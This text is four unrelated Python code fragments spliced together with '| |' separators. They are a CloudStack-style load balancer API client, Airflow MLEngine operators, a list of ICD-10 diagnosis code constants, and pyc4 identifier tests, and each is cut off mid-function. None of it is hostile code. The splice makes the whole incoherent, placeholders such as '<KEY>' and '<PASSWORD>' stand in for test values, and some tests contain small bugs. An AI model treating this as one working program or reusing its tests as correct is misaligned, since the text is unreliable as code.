args - A dictionary. The following are options for keys:
algorithm - load balancer algorithm (source, roundrobin, leastconn)
name - name of the load balancer rule
instanceport - the TCP port of the virtual machine where the network traffic will be load balanced to
networkid - The guest network the Load Balancer will be created for
scheme - the load balancer scheme. Supported value in this release is Internal
sourceipaddressnetworkid - the network id of the source ip address
sourceport - the source port the network traffic will be load balanced from
description - (optional) the description of the Load Balancer
sourceipaddress - (optional) the source ip address the network traffic will be load balanced from
'''
if 'algorithm' not in args:
raise RuntimeError("Missing required argument 'algorithm'")
if 'name' not in args:
raise RuntimeError("Missing required argument 'name'")
if 'instanceport' not in args:
raise RuntimeError("Missing required argument 'instanceport'")
if 'networkid' not in args:
raise RuntimeError("Missing required argument 'networkid'")
if 'scheme' not in args:
raise RuntimeError("Missing required argument 'scheme'")
if 'sourceipaddressnetworkid' not in args:
raise RuntimeError(
"Missing required argument 'sourceipaddressnetworkid'")
if 'sourceport' not in args:
raise RuntimeError("Missing required argument 'sourceport'")
return self.request('createLoadBalancer', args)
def createLoadBalancerRule(self, args={}):
'''
Creates a load balancer rule
args - A dictionary. The following are options for keys:
algorithm - load balancer algorithm (source, roundrobin, leastconn)
name - name of the load balancer rule
privateport - the private port of the private ip address/virtual machine
where the network traffic will be load balanced to
publicport - the public port from where the network traffic will be load
balanced from
account - the account associated with the load balancer. Must be used with
the domainId parameter.
cidrlist - the cidr list to forward traffic from
description - the description of the load balancer rule
domainid - the domain ID associated with the load balancer
networkid - The guest network this rule will be created for
openfirewall - if true, firewall rule for source/end pubic port is
automatically created; if false - firewall rule has to be created explicitely.
Has value true by default
publicipid - public ip address id from where the network traffic will be
load balanced from
zoneid - zone where the load balancer is going to be created. This parameter
is required when LB service provider is ElasticLoadBalancerVm
'''
if 'algorithm' not in args:
raise RuntimeError("Missing required argument 'algorithm'")
if 'name' not in args:
raise RuntimeError("Missing required argument 'name'")
if 'privateport' not in args:
raise RuntimeError("Missing required argument 'privateport'")
if 'publicport' not in args:
raise RuntimeError("Missing required argument 'publicport'")
return self.request('createLoadBalancerRule', args)
def deleteLoadBalancerRule(self, args={}):
'''
Deletes a load balancer rule.
args - A dictionary. The following are options for keys:
id - the ID of the load balancer rule
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('deleteLoadBalancerRule', args)
def removeFromLoadBalancerRule(self, args={}):
'''
Removes a virtual machine or a list of virtual machines from a load balancer
rule.
args - A dictionary. The following are options for keys:
id - The ID of the load balancer rule
virtualmachineids - the list of IDs of the virtual machines that are being
removed from the load balancer rule (i.e. virtualMachineIds=1,2,3)
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
if 'virtualmachineids' not in args:
raise RuntimeError("Missing required argument 'virtualmachineids'")
return self.request('removeFromLoadBalancerRule', args)
def assignToLoadBalancerRule(self, args={}):
'''
Assigns virtual machine or a list of virtual machines to a load balancer rule.
args - A dictionary. The following are options for keys:
id - the ID of the load balancer rule
virtualmachineids - the list of IDs of the virtual machine that are being
assigned to the load balancer rule(i.e. virtualMachineIds=1,2,3)
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
if 'virtualmachineids' not in args:
raise RuntimeError("Missing required argument 'virtualmachineids'")
return self.request('assignToLoadBalancerRule', args)
def createLBStickinessPolicy(self, args={}):
'''
Creates a Load Balancer stickiness policy
args - A dictionary. The following are options for keys:
lbruleid - the ID of the load balancer rule
methodname - name of the LB Stickiness policy method, possible values can be
obtained from ListNetworks API
name - name of the LB Stickiness policy
description - the description of the LB Stickiness policy
param - param list. Example:
param[0].name=cookiename¶m[0].value=LBCookie
'''
if 'lbruleid' not in args:
raise RuntimeError("Missing required argument 'lbruleid'")
if 'methodname' not in args:
raise RuntimeError("Missing required argument 'methodname'")
if 'name' not in args:
raise RuntimeError("Missing required argument 'name'")
return self.request('createLBStickinessPolicy', args)
def deleteLBStickinessPolicy(self, args={}):
'''
Deletes a LB stickiness policy.
args - A dictionary. The following are options for keys:
id - the ID of the LB stickiness policy
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('deleteLBStickinessPolicy', args)
def listLoadBalancerRules(self, args={}):
'''
Lists load balancer rules.
args - A dictionary. The following are options for keys:
account - List resources by account. Must be used with the domainId
parameter.
domainid - list only resources belonging to the domain specified
id - the ID of the load balancer rule
isrecursive - defaults to false, but if true, lists all resources from the
parent specified by the domainId till leaves.
keyword - List by keyword
listall - If set to false, list only resources belonging to the command's
caller; if set to true - list resources that the caller is authorized to see.
Default value is false
name - the name of the load balancer rule
page -
pagesize -
projectid - list firewall rules by project
publicipid - the public IP address id of the load balancer rule
virtualmachineid - the ID of the virtual machine of the load balancer rule
zoneid - the availability zone ID
page - Pagination
'''
return self.request('listLoadBalancerRules', args)
def listLBStickinessPolicies(self, args={}):
'''
Lists LBStickiness policies.
args - A dictionary. The following are options for keys:
lbruleid - the ID of the load balancer rule
keyword - List by keyword
page -
pagesize -
page - Pagination
'''
if 'lbruleid' not in args:
raise RuntimeError("Missing required argument 'lbruleid'")
return self.request('listLBStickinessPolicies', args)
def listLoadBalancerRuleInstances(self, args={}):
'''
List all virtual machine instances that are assigned to a load balancer rule.
args - A dictionary. The following are options for keys:
id - the ID of the load balancer rule
applied - true if listing all virtual machines currently applied to the load
balancer rule; default is true
keyword - List by keyword
page -
pagesize -
page - Pagination
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('listLoadBalancerRuleInstances', args)
def updateLoadBalancerRule(self, args={}):
'''
Updates load balancer
args - A dictionary. The following are options for keys:
id - the id of the load balancer rule to update
algorithm - load balancer algorithm (source, roundrobin, leastconn)
description - the description of the load balancer rule
name - the name of the load balancer rule
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('updateLoadBalancerRule', args)
def addF5LoadBalancer(self, args={}):
'''
Adds a F5 BigIP load balancer device
args - A dictionary. The following are options for keys:
networkdevicetype - supports only F5BigIpLoadBalancer
password - <PASSWORD> reach F5 BigIP load balancer device
physicalnetworkid - the Physical Network ID
url - URL of the F5 load balancer | |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This module contains GCP MLEngine operators.
"""
import re
import warnings
from typing import List, Optional
from airflow.exceptions import AirflowException
from airflow.models import BaseOperator
from airflow.providers.google.cloud.hooks.mlengine import MLEngineHook
from airflow.utils.decorators import apply_defaults
from airflow.utils.log.logging_mixin import LoggingMixin
log = LoggingMixin().log
def _normalize_mlengine_job_id(job_id: str) -> str:
"""
Replaces invalid MLEngine job_id characters with '_'.
This also adds a leading 'z' in case job_id starts with an invalid
character.
:param job_id: A job_id str that may have invalid characters.
:type job_id: str:
:return: A valid job_id representation.
:rtype: str
"""
# Add a prefix when a job_id starts with a digit or a template
match = re.search(r'\d|\{{2}', job_id)
if match and match.start() == 0:
job = 'z_{}'.format(job_id)
else:
job = job_id
# Clean up 'bad' characters except templates
tracker = 0
cleansed_job_id = ''
for match in re.finditer(r'\{{2}.+?\}{2}', job):
cleansed_job_id += re.sub(r'[^0-9a-zA-Z]+', '_',
job[tracker:match.start()])
cleansed_job_id += job[match.start():match.end()]
tracker = match.end()
# Clean up last substring or the full string if no templates
cleansed_job_id += re.sub(r'[^0-9a-zA-Z]+', '_', job[tracker:])
return cleansed_job_id
class MLEngineStartBatchPredictionJobOperator(BaseOperator):
"""
Start a Google Cloud ML Engine prediction job.
NOTE: For model origin, users should consider exactly one from the
three options below:
1. Populate ``uri`` field only, which should be a GCS location that
points to a tensorflow savedModel directory.
2. Populate ``model_name`` field only, which refers to an existing
model, and the default version of the model will be used.
3. Populate both ``model_name`` and ``version_name`` fields, which
refers to a specific version of a specific model.
In options 2 and 3, both model and version name should contain the
minimal identifier. For instance, call::
MLEngineBatchPredictionOperator(
...,
model_name='my_model',
version_name='my_version',
...)
if the desired model version is
``projects/my_project/models/my_model/versions/my_version``.
See https://cloud.google.com/ml-engine/reference/rest/v1/projects.jobs
for further documentation on the parameters.
:param job_id: A unique id for the prediction job on Google Cloud
ML Engine. (templated)
:type job_id: str
:param data_format: The format of the input data.
It will default to 'DATA_FORMAT_UNSPECIFIED' if is not provided
or is not one of ["TEXT", "TF_RECORD", "TF_RECORD_GZIP"].
:type data_format: str
:param input_paths: A list of GCS paths of input data for batch
prediction. Accepting wildcard operator ``*``, but only at the end. (templated)
:type input_paths: list[str]
:param output_path: The GCS path where the prediction results are
written to. (templated)
:type output_path: str
:param region: The Google Compute Engine region to run the
prediction job in. (templated)
:type region: str
:param model_name: The Google Cloud ML Engine model to use for prediction.
If version_name is not provided, the default version of this
model will be used.
Should not be None if version_name is provided.
Should be None if uri is provided. (templated)
:type model_name: str
:param version_name: The Google Cloud ML Engine model version to use for
prediction.
Should be None if uri is provided. (templated)
:type version_name: str
:param uri: The GCS path of the saved model to use for prediction.
Should be None if model_name is provided.
It should be a GCS path pointing to a tensorflow SavedModel. (templated)
:type uri: str
:param max_worker_count: The maximum number of workers to be used
for parallel processing. Defaults to 10 if not specified. Should be a
string representing the worker count ("10" instead of 10, "50" instead
of 50, etc.)
:type max_worker_count: str
:param runtime_version: The Google Cloud ML Engine runtime version to use
for batch prediction.
:type runtime_version: str
:param signature_name: The name of the signature defined in the SavedModel
to use for this job.
:type signature_name: str
:param project_id: The Google Cloud project name where the prediction job is submitted.
If set to None or missing, the default project_id from the GCP connection is used. (templated)
:type project_id: str
:param gcp_conn_id: The connection ID used for connection to Google
Cloud Platform.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate, if any.
For this to work, the service account making the request must
have domain-wide delegation enabled.
:type delegate_to: str
:raises: ``ValueError``: if a unique model/version origin cannot be
determined.
"""
template_fields = [
'_project_id',
'_job_id',
'_region',
'_input_paths',
'_output_path',
'_model_name',
'_version_name',
'_uri',
]
@apply_defaults
def __init__(self, # pylint: disable=too-many-arguments
job_id: str,
region: str,
data_format: str,
input_paths: List[str],
output_path: str,
model_name: Optional[str] = None,
version_name: Optional[str] = None,
uri: Optional[str] = None,
max_worker_count: Optional[int] = None,
runtime_version: Optional[str] = None,
signature_name: Optional[str] = None,
project_id: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
*args,
**kwargs) -> None:
super().__init__(*args, **kwargs)
self._project_id = project_id
self._job_id = job_id
self._region = region
self._data_format = data_format
self._input_paths = input_paths
self._output_path = output_path
self._model_name = model_name
self._version_name = version_name
self._uri = uri
self._max_worker_count = max_worker_count
self._runtime_version = runtime_version
self._signature_name = signature_name
self._gcp_conn_id = gcp_conn_id
self._delegate_to = delegate_to
if not self._project_id:
raise AirflowException('Google Cloud project id is required.')
if not self._job_id:
raise AirflowException(
'An unique job id is required for Google MLEngine prediction '
'job.')
if self._uri:
if self._model_name or self._version_name:
raise AirflowException('Ambiguous model origin: Both uri and '
'model/version name are provided.')
if self._version_name and not self._model_name:
raise AirflowException(
'Missing model: Batch prediction expects '
'a model name when a version name is provided.')
if not (self._uri or self._model_name):
raise AirflowException(
'Missing model origin: Batch prediction expects a model, '
'a model & version combination, or a URI to a savedModel.')
def execute(self, context):
job_id = _normalize_mlengine_job_id(self._job_id)
prediction_request = {
'jobId': job_id,
'predictionInput': {
'dataFormat': self._data_format,
'inputPaths': self._input_paths,
'outputPath': self._output_path,
'region': self._region
}
}
if self._uri:
prediction_request['predictionInput']['uri'] = self._uri
elif self._model_name:
origin_name = 'projects/{}/models/{}'.format(
self._project_id, self._model_name)
if not self._version_name:
prediction_request['predictionInput'][
'modelName'] = origin_name
else:
prediction_request['predictionInput']['versionName'] = \
origin_name + '/versions/{}'.format(self._version_name)
if self._max_worker_count:
prediction_request['predictionInput'][
'maxWorkerCount'] = self._max_worker_count
if self._runtime_version:
prediction_request['predictionInput'][
'runtimeVersion'] = self._runtime_version
if self._signature_name:
prediction_request['predictionInput'][
'signatureName'] = self._signature_name
hook = MLEngineHook(self._gcp_conn_id, self._delegate_to)
# Helper method to check if the existing job's prediction input is the
# same as the request we get here.
def check_existing_job(existing_job):
return existing_job.get('predictionInput', None) == \
prediction_request['predictionInput']
finished_prediction_job = hook.create_job(
project_id=self._project_id, job=prediction_request, use_existing_job_fn=check_existing_job
)
if finished_prediction_job['state'] != 'SUCCEEDED':
self.log.error(
'MLEngine batch prediction job failed: %s', str(finished_prediction_job)
)
raise RuntimeError(finished_prediction_job['errorMessage'])
return finished_prediction_job['predictionOutput']
class MLEngineManageModelOperator(BaseOperator):
"""
Operator for managing a Google Cloud ML Engine model.
.. warning::
This operator is deprecated. Consider using operators for specific operations:
MLEngineCreateModelOperator, MLEngineGetModelOperator.
:param model: A dictionary containing the information about the model.
If the `operation` is `create`, then the `model` parameter should
contain all the information about this model such as `name`.
If the `operation` is `get`, the `model` parameter
should contain the `name` of the model.
:type model: dict
:param operation: The operation to perform. Available operations are:
* ``create``: Creates a new model as provided by the `model` parameter.
* ``get``: Gets a particular model where the name is specified in `model`.
:type operation: str
:param project_id: The Google Cloud project name to which MLEngine model belongs.
If set to None or missing, the default project_id from the GCP connection is used. (templated)
:type project_id: str
:param gcp_conn_id: The connection ID to use when fetching connection info.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate, if any.
For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
"""
template_fields = [
'_project_id',
'_model',
]
@apply_defaults
def __init__(self,
model: dict,
operation: str = 'create',
| |
= "M51.2"
M51_3 = "M51.3"
M51_4 = "M51.4"
M51_8 = "M51.8"
M51_9 = "M51.9"
M53 = "M53"
M53_0 = "M53.0"
M53_1 = "M53.1"
M53_2 = "M53.2"
M53_3 = "M53.3"
M53_8 = "M53.8"
M53_9 = "M53.9"
M54 = "M54"
M54_0 = "M54.0"
M54_1 = "M54.1"
M54_2 = "M54.2"
M54_3 = "M54.3"
M54_4 = "M54.4"
M54_5 = "M54.5"
M54_6 = "M54.6"
M54_8 = "M54.8"
M54_9 = "M54.9"
M60_M79 = "M60-M79"
M60_M62 = "M60-M62"
M60 = "M60"
M60_0 = "M60.0"
M60_1 = "M60.1"
M60_2 = "M60.2"
M60_8 = "M60.8"
M60_9 = "M60.9"
M61 = "M61"
M61_0 = "M61.0"
M61_1 = "M61.1"
M61_2 = "M61.2"
M61_3 = "M61.3"
M61_4 = "M61.4"
M61_5 = "M61.5"
M61_9 = "M61.9"
M62 = "M62"
M62_0 = "M62.0"
M62_1 = "M62.1"
M62_2 = "M62.2"
M62_3 = "M62.3"
M62_4 = "M62.4"
M62_5 = "M62.5"
M62_6 = "M62.6"
M62_8 = "M62.8"
M62_9 = "M62.9"
M65_M67 = "M65-M67"
M65 = "M65"
M65_0 = "M65.0"
M65_1 = "M65.1"
M65_2 = "M65.2"
M65_3 = "M65.3"
M65_4 = "M65.4"
M65_8 = "M65.8"
M65_9 = "M65.9"
M66 = "M66"
M66_0 = "M66.0"
M66_1 = "M66.1"
M66_2 = "M66.2"
M66_3 = "M66.3"
M66_4 = "M66.4"
M66_5 = "M66.5"
M67 = "M67"
M67_0 = "M67.0"
M67_1 = "M67.1"
M67_2 = "M67.2"
M67_3 = "M67.3"
M67_4 = "M67.4"
M67_8 = "M67.8"
M67_9 = "M67.9"
M70_M79 = "M70-M79"
M70 = "M70"
M70_0 = "M70.0"
M70_1 = "M70.1"
M70_2 = "M70.2"
M70_3 = "M70.3"
M70_4 = "M70.4"
M70_5 = "M70.5"
M70_6 = "M70.6"
M70_7 = "M70.7"
M70_8 = "M70.8"
M70_9 = "M70.9"
M71 = "M71"
M71_0 = "M71.0"
M71_1 = "M71.1"
M71_2 = "M71.2"
M71_3 = "M71.3"
M71_4 = "M71.4"
M71_5 = "M71.5"
M71_8 = "M71.8"
M71_9 = "M71.9"
M72 = "M72"
M72_0 = "M72.0"
M72_1 = "M72.1"
M72_2 = "M72.2"
M72_3 = "M72.3"
M72_4 = "M72.4"
M72_5 = "M72.5"
M72_6 = "M72.6"
M72_8 = "M72.8"
M72_9 = "M72.9"
M75 = "M75"
M75_0 = "M75.0"
M75_1 = "M75.1"
M75_2 = "M75.2"
M75_3 = "M75.3"
M75_4 = "M75.4"
M75_5 = "M75.5"
M75_8 = "M75.8"
M75_9 = "M75.9"
M76 = "M76"
M76_0 = "M76.0"
M76_1 = "M76.1"
M76_2 = "M76.2"
M76_3 = "M76.3"
M76_4 = "M76.4"
M76_5 = "M76.5"
M76_6 = "M76.6"
M76_7 = "M76.7"
M76_8 = "M76.8"
M76_9 = "M76.9"
M77 = "M77"
M77_0 = "M77.0"
M77_1 = "M77.1"
M77_2 = "M77.2"
M77_3 = "M77.3"
M77_4 = "M77.4"
M77_5 = "M77.5"
M77_8 = "M77.8"
M77_9 = "M77.9"
M79 = "M79"
M79_0 = "M79.0"
M79_1 = "M79.1"
M79_2 = "M79.2"
M79_3 = "M79.3"
M79_4 = "M79.4"
M79_5 = "M79.5"
M79_6 = "M79.6"
M79_7 = "M79.7"
M79_8 = "M79.8"
M79_9 = "M79.9"
M80_M94 = "M80-M94"
M80_M85 = "M80-M85"
M80 = "M80"
M80_0 = "M80.0"
M80_1 = "M80.1"
M80_2 = "M80.2"
M80_3 = "M80.3"
M80_4 = "M80.4"
M80_5 = "M80.5"
M80_8 = "M80.8"
M80_9 = "M80.9"
M81 = "M81"
M81_0 = "M81.0"
M81_1 = "M81.1"
M81_2 = "M81.2"
M81_3 = "M81.3"
M81_4 = "M81.4"
M81_5 = "M81.5"
M81_6 = "M81.6"
M81_8 = "M81.8"
M81_9 = "M81.9"
M83 = "M83"
M83_0 = "M83.0"
M83_1 = "M83.1"
M83_2 = "M83.2"
M83_3 = "M83.3"
M83_4 = "M83.4"
M83_5 = "M83.5"
M83_8 = "M83.8"
M83_9 = "M83.9"
M84 = "M84"
M84_0 = "M84.0"
M84_1 = "M84.1"
M84_2 = "M84.2"
M84_3 = "M84.3"
M84_4 = "M84.4"
M84_8 = "M84.8"
M84_9 = "M84.9"
M85 = "M85"
M85_0 = "M85.0"
M85_1 = "M85.1"
M85_2 = "M85.2"
M85_3 = "M85.3"
M85_4 = "M85.4"
M85_5 = "M85.5"
M85_6 = "M85.6"
M85_8 = "M85.8"
M85_9 = "M85.9"
M86_M89 = "M86-M89"
M86 = "M86"
M86_0 = "M86.0"
M86_1 = "M86.1"
M86_2 = "M86.2"
M86_3 = "M86.3"
M86_4 = "M86.4"
M86_5 = "M86.5"
M86_6 = "M86.6"
M86_8 = "M86.8"
M86_9 = "M86.9"
M87 = "M87"
M87_0 = "M87.0"
M87_1 = "M87.1"
M87_2 = "M87.2"
M87_3 = "M87.3"
M87_8 = "M87.8"
M87_9 = "M87.9"
M88 = "M88"
M88_0 = "M88.0"
M88_8 = "M88.8"
M88_9 = "M88.9"
M89 = "M89"
M89_0 = "M89.0"
M89_1 = "M89.1"
M89_2 = "M89.2"
M89_3 = "M89.3"
M89_4 = "M89.4"
M89_5 = "M89.5"
M89_6 = "M89.6"
M89_8 = "M89.8"
M89_9 = "M89.9"
M91_M94 = "M91-M94"
M91 = "M91"
M91_0 = "M91.0"
M91_1 = "M91.1"
M91_2 = "M91.2"
M91_3 = "M91.3"
M91_8 = "M91.8"
M91_9 = "M91.9"
M92 = "M92"
M92_0 = "M92.0"
M92_1 = "M92.1"
M92_2 = "M92.2"
M92_3 = "M92.3"
M92_4 = "M92.4"
M92_5 = "M92.5"
M92_6 = "M92.6"
M92_7 = "M92.7"
M92_8 = "M92.8"
M92_9 = "M92.9"
M93 = "M93"
M93_0 = "M93.0"
M93_1 = "M93.1"
M93_2 = "M93.2"
M93_8 = "M93.8"
M93_9 = "M93.9"
M94 = "M94"
M94_0 = "M94.0"
M94_1 = "M94.1"
M94_2 = "M94.2"
M94_3 = "M94.3"
M94_8 = "M94.8"
M94_9 = "M94.9"
M95_M99 = "M95-M99"
M95 = "M95"
M95_0 = "M95.0"
M95_1 = "M95.1"
M95_2 = "M95.2"
M95_3 = "M95.3"
M95_4 = "M95.4"
M95_5 = "M95.5"
M95_8 = "M95.8"
M95_9 = "M95.9"
M99 = "M99"
M99_0 = "M99.0"
M99_1 = "M99.1"
M99_2 = "M99.2"
M99_3 = "M99.3"
M99_4 = "M99.4"
M99_5 = "M99.5"
M99_6 = "M99.6"
M99_7 = "M99.7"
M99_8 = "M99.8"
M99_9 = "M99.9"
N00_N98 = "N00-N98"
N00_N07 = "N00-N07"
N00 = "N00"
N00_0 = "N00.0"
N00_1 = "N00.1"
N00_2 = "N00.2"
N00_3 = "N00.3"
N00_4 = "N00.4"
N00_5 = "N00.5"
N00_6 = "N00.6"
N00_7 = "N00.7"
N00_8 = "N00.8"
N00_9 = "N00.9"
N01 = "N01"
N01_0 = "N01.0"
N01_1 = "N01.1"
N01_2 = "N01.2"
N01_3 = "N01.3"
N01_4 = "N01.4"
N01_5 = "N01.5"
N01_6 = "N01.6"
N01_7 = "N01.7"
N01_8 = "N01.8"
N01_9 = "N01.9"
N02 = "N02"
N02_0 = "N02.0"
N02_1 = "N02.1"
N02_2 = "N02.2"
N02_3 = "N02.3"
N02_4 = "N02.4"
N02_5 = "N02.5"
N02_6 = "N02.6"
N02_7 = "N02.7"
N02_8 = "N02.8"
N02_9 = "N02.9"
N03 = "N03"
N03_0 = "N03.0"
N03_1 = "N03.1"
N03_2 = "N03.2"
N03_3 = "N03.3"
N03_4 = "N03.4"
N03_5 = "N03.5"
N03_6 = "N03.6"
N03_7 = "N03.7"
N03_8 = "N03.8"
N03_9 = "N03.9"
N04 = "N04"
N04_0 = "N04.0"
N04_1 = "N04.1"
N04_2 = "N04.2"
N04_3 = "N04.3"
N04_4 = "N04.4"
N04_5 = "N04.5"
N04_6 = "N04.6"
N04_7 = "N04.7"
N04_8 = "N04.8"
N04_9 = "N04.9"
N05 = "N05"
N05_0 = "N05.0"
N05_1 = "N05.1"
N05_2 = "N05.2"
N05_3 = "N05.3"
N05_4 = "N05.4"
N05_5 = "N05.5"
N05_6 = "N05.6"
N05_7 = "N05.7"
N05_8 = "N05.8"
N05_9 = "N05.9"
N06 = "N06"
N06_0 = "N06.0"
N06_1 = "N06.1"
N06_2 = "N06.2"
N06_3 = "N06.3"
N06_4 = "N06.4"
N06_5 = "N06.5"
N06_6 = "N06.6"
N06_7 = "N06.7"
N06_8 = "N06.8"
N06_9 = "N06.9"
N07 = "N07"
N07_0 = "N07.0"
N07_1 = "N07.1"
N07_2 = "N07.2"
N07_3 = "N07.3"
N07_4 = "N07.4"
N07_5 = "N07.5"
N07_6 = "N07.6"
N07_7 = "N07.7"
N07_8 = "N07.8"
N07_9 = "N07.9"
N10_N15 = "N10-N15"
N10 = "N10"
N11 = "N11"
N11_0 = "N11.0"
N11_1 = "N11.1"
N11_8 = "N11.8"
N11_9 = "N11.9"
N12 = "N12"
N13 = "N13"
N13_0 = "N13.0"
N13_1 = "N13.1"
N13_2 = "N13.2"
N13_3 = "N13.3"
N13_4 = "N13.4"
N13_5 = "N13.5"
N13_6 = "N13.6"
N13_7 = "N13.7"
N13_8 = "N13.8"
N13_9 = "N13.9"
N14 = "N14"
N14_0 = "N14.0"
N14_1 = "N14.1"
N14_2 = "N14.2"
N14_3 = "N14.3"
N14_4 = "N14.4"
N15 = "N15"
N15_0 = "N15.0"
N15_1 = "N15.1"
N15_8 = "N15.8"
N15_9 = "N15.9"
N17_N19 = "N17-N19"
N17 = "N17"
N17_0 = "N17.0"
N17_1 = "N17.1"
N17_2 = "N17.2"
N17_8 = "N17.8"
N17_9 = "N17.9"
N18 = "N18"
N18_0 = "N18.0"
N18_1 = "N18.1"
N18_2 = "N18.2"
N18_3 = "N18.3"
N18_4 = "N18.4"
N18_5 = "N18.5"
N18_8 = "N18.8"
N18_9 = "N18.9"
N19 = "N19"
N20_N23 = "N20-N23"
N20 = "N20"
N20_0 = "N20.0"
N20_1 = "N20.1"
N20_2 = "N20.2"
N20_9 = "N20.9"
N21 = "N21"
N21_0 = "N21.0"
N21_1 = "N21.1"
N21_8 = "N21.8"
N21_9 = "N21.9"
N23 = "N23"
N25_N28 = "N25-N28"
N25 = "N25"
| |
from __future__ import print_function
import sys
from pyc4 import c4
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def test_sum():
assert sum([1, 2, 3]) == 6, "Should be 6"
def test_encoding():
tests = [ { 'in': "", 'exp': "<KEY>" } ]
for test in tests:
actual = c4.Identify(test['in'])
if actual.string() != test['exp']:
eprint("IDs don't match, got ", actual, " expected ", test["exp"])
return False
return True
def test_all_ffff():
b = []
for i in range(64):
b.append(chr(0xFF))
data = ''.join(b)
if c4.ID(data).string() != "<KEY>":
eprint("IDs don't match, got ", id.string(), " expcted ", "<KEY>")
return False
id2, err = c4.parse("<KEY>")
if err:
eprint("Unexpected error ", err)
return False
for bb in id2.value:
if bb != chr(0xFF):
eprint(bb, "incorrect Parse results")
return False
return True
def test_all_0000():
b = []
for i in range(64):
b.append(chr(0))
data = ''.join(b)
if c4.ID(data).string() != "c41111111111111111111111111111111111111111111111111111111111111111111111111111111111111111":
eprint("IDs don't match, got ", id.string(), " expcted ",
"c41111111111111111111111111111111111111111111111111111111111111111111111111111111111111111")
return False
id2, err = c4.parse(
"c41111111111111111111111111111111111111111111111111111111111111111111111111111111111111111")
if err:
eprint("Unexpected error ", err)
return False
for bb in id2.value:
if bb != chr(0):
eprint(bb, "incorrect Parse results")
return False
return True
def test_append_order():
byteData = [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 58],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0x0d, 0x24],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0xfa, 0x28],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xac, 0xad, 0x10]
]
expectedIDs = ["c41111111111111111111111111111111111111111111111111111111111111111111111111111111111111121", "c41111111111111111111111111111111111111111111111111111111111111111111111111111111111111211", "c41111111111111111111111111111111111111111111111111111111111111111111111111111111111112111", "c41111111111111111111111111111111111111111111111111111111111111111111111111111111111121111"]
k = 0
for num in byteData:
b = []
for c in num:
b.append(chr(c))
id = c4.ID(''.join(b))
if id.string() != expectedIDs[k]:
eprint("IDs don't match, got ", id.string(), " , expcted ", expectedIDs[k])
return False
id2, err = c4.parse(expectedIDs[k])
if err:
eprint("Unexpected error ", err)
return False
i = 0
for bb in id2.value:
if bb != chr(byteData[k][i]):
eprint(bb, "incorrect Parse results")
return False
i = i + 1
k = k + 1
return True
def test_parse():
tests = [
{ "in": "<KEY>",
"err": None,
"exp": "This is a pretend asset file, for testing asset id generation.\n"
},
{
"in": "<KEY>",
"err": "invalid character at 3",
"exp": ""
},
{
"in": "c430cjRutKqZSCrW43QGU1uwRZTGoVD7A7kPHKQ1z4X<KEY>",
"err": "is not 90 characters long",
"exp": ""
}
]
i = 0
for test in tests:
id, err = c4.parse(test["in"])
if test["err"] is not None:
if not err:
eprint("Expected error but got none")
return False
elif err != test["err"]:
eprint("incorrect error got ", err, " expected ", test["err"])
return False
continue
elif err is not None:
eprint("Unexpected error ", err)
return False
expectedID = c4.Identify(test["exp"])
if expectedID != id:
eprint("IDs don't match, got ", _stringOf(id), ", expcted ", _stringOf(expectedID))
return False
return True
def _stringOf(id):
if not id:
return ""
return id.string()
def test_id_less():
id1 = c4.Identify("1") # <KEY>
id2 = c4.Identify("2") # c42i2hTBA9Ej4nqEo9iUy3pJRRE53KAH9RwwMSWjmfaQN7LxCymVz1zL9hEjqeFYzxtxXz2wRK7CBtt71AFkRfHodu
if id1.less(id2) != False:
eprint("expected %q to be less than %q", id2, id1)
return False
return True
def test_id_cmp():
id1 = c4.Identify("1") # c42yrSHMvUcscrQBssLhrRE28YpGUv9Gf95uH8KnwTiBv4odDbVqNnCYFs3xpsLrgVZfHebSaQQsvxgDGmw5CX1fVy
id2 = c4.Identify("2") # c42i2hTBA9Ej4nqEo9iUy3pJRRE53KAH9RwwMSWjmfaQN7LxCymVz1zL9hEjqeFYzxtxXz2wRK7CBtt71AFkRfHodu
# is.Equal(id1.Cmp(id2), 1)
if id1.Cmp(id2) != 1:
